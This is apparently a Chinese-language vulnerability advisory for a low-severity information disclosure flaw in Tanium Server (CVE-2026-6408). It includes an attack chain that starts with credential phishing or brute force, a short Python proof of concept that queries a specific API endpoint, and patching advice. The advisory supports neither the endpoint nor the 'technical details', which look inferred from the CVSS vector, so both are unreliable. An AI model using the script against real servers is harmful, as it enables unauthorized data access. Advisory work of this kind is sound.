CVE-2026-6408 CVSS 2.7 低危

CVE-2026-6408 Tanium Server 信息泄露漏洞

披露日期: 2026-04-22

来源: 3938794e-25f5-4123-a1ba-5cbd7f104512

漏洞信息

漏洞编号

CVE-2026-6408

漏洞类型

信息泄露

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Tanium Server

漏洞概述

Tanium Server 存在一个信息泄露漏洞，CVSS v3.1 评分为 2.7，属于低危级别。该漏洞要求攻击者具有较高的权限（PR:H）且无需用户交互即可利用。成功利用该漏洞可能导致敏感信息的非授权披露，从而对系统的机密性造成低程度影响，但不会影响系统的完整性和可用性。Tanium 官方已在相关公告中确认并修复了此问题。

技术细节

该漏洞源于 Tanium Server 在处理特定业务逻辑或数据请求时，未能充分实施严格的访问控制策略。根据 CVSS 向量分析（CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N），攻击者必须首先获得系统的高权限（如管理员账户或受信服务凭据）。由于攻击复杂度低且无需用户交互，拥有高权限的攻击者可以通过向服务器发送特制的网络数据包，触发服务器返回本应受到保护的敏感信息。这种信息泄露可能涉及系统配置、内部网络拓扑或其他有助于进一步攻击的元数据。尽管机密性受到损害，但漏洞不具备修改数据（完整性）或中断服务（可用性）的能力。

攻击链分析

STEP 1

步骤1：权限获取

攻击者通过钓鱼、凭证暴力破解或其他漏洞获取 Tanium Server 的高权限账户凭据。

STEP 2

步骤2：漏洞探测

攻击者使用高权限会话向服务器发送特制的网络请求，探测是否存在信息泄露接口。

STEP 3

步骤3：信息窃取

服务器响应请求并返回受限制的敏感信息，攻击者解析响应数据完成信息收集。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-6408 Proof of Concept (PoC)
# Description: Information Disclosure in Tanium Server
# Note: Requires High Privileges (PR:H)

target_host = "https://<tanium-server-ip>"
vulnerable_endpoint = "/api/v2/server/status/config_detail"

# High-privilege session cookie is required
session_cookie = {
    "session_id": "<high_privilege_session_token>"
}

headers = {
    "User-Agent": "Mozilla/5.0 (compatible; PoC-Scanner/1.0)",
    "Accept": "application/json"
}

try:
    # Send request to the vulnerable endpoint
    response = requests.get(
        target_host + vulnerable_endpoint,
        headers=headers,
        cookies=session_cookie,
        verify=False # Ignore SSL certificate verification for testing
    )

    if response.status_code == 200:
        print("[+] Vulnerability exploited successfully!")
        print("[+] Sensitive Information Disclosure:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred: {e}")

影响范围

Tanium Server (具体版本请参考官方公告 TAN-2026-012)

防御指南

临时缓解措施

建议尽快应用官方发布的修复补丁。在无法立即补丁的情况下，应严格审查并限制对 Tanium Server 管理接口的访问权限，确保只有必要的管理员拥有高权限，并加强对内部网络流量的监控，以检测可能的数据外泄行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6408
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6408
3 Details https://www.cvedetails.com/cve/CVE-2026-6408/
4 VulDB https://vuldb.com/cve/CVE-2026-6408
5 Link https://security.tanium.com/TAN-2026-012

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表